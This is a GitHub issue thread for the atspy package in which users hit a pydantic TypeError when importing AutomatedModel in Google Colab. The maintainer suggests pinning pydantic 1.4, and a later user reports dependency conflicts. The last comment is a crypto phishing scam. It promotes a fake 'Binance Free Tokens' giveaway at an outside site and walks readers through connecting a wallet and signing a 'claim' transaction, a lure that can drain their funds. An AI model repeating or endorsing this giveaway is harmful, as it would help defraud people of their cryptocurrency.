### ISSUE TITLE
Error when importing the AutomatedModel package in Google Colab

### ISSUE THREAD

**Issue by jtfields** [firmai/atspy#11]
I followed the steps in the Google Colab notebook and restarted the runtime after installing the package.  However, I'm receiving the message below when I try to import AutomatedModel.  Any suggestions for how to fix this?

from atspy import AutomatedModel
---------------------------------------------------------------------------
TypeError                                 Traceback (most recent call last)
<ipython-input-1-0da3f3f7fc22> in <module>()
----> 1 from atspy import AutomatedModel

7 frames
/usr/local/lib/python3.6/dist-packages/pydantic/main.cpython-36m-x86_64-linux-gnu.so in pydantic.main.create_model()

TypeError: create_model() takes exactly 1 positional argument (0 given)

**Comment by stefanosh** [comment]
I'm having the same issue today as well.

**Comment by firmai** [comment]
Thanks, seem there has been a change to an upstream package used by gluonts called pydantic. You can add this to your colab ```!pip install pydantic==1.4```, I have also patched the package, it should work now.

**Comment by stefanosh** [comment]
I can confirm it works now. Thanks!

**Comment by jtfields** [comment]
Yes, thank you for the quick response.  Many in my Big Data Analytics class at Syracuse will use AtsPy for our next time series lab.

**Comment by Pesssy** [comment]
I followed the steps in the Google Colab notebook and restarted the runtime after installing the package. However, I'm receiving the message below when I try to import AutomatedModel


I also installed ran this command  !pip install pydantic==1.4,   and i am getting the message


ERROR: pip's dependency resolver does not currently take into account all the packages that are installed. This behaviour is the source of the following dependency conflicts.
thinc 8.1.0 requires pydantic!=1.8,!=1.8.1,<1.10.0,>=1.7.4, but you have pydantic 1.4 which is incompatible.
spacy 3.4.1 requires pydantic!=1.8,!=1.8.1,<1.10.0,>=1.7.4, but you have pydantic 1.4 which is incompatible.
fastai 2.7.9 requires torch<1.14,>=1.7, but you have torch 1.4.0 which is incompatible.
fastai 2.7.9 requires torchvision>=0.8.2, but you have torchvision 0.5.0 which is incompatible.
Successfully installed pydantic-1.4

i also encountered the ModuleNotFoundError upon implementing the    from atspy import AutomatedModel   


I will appreciate your help

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
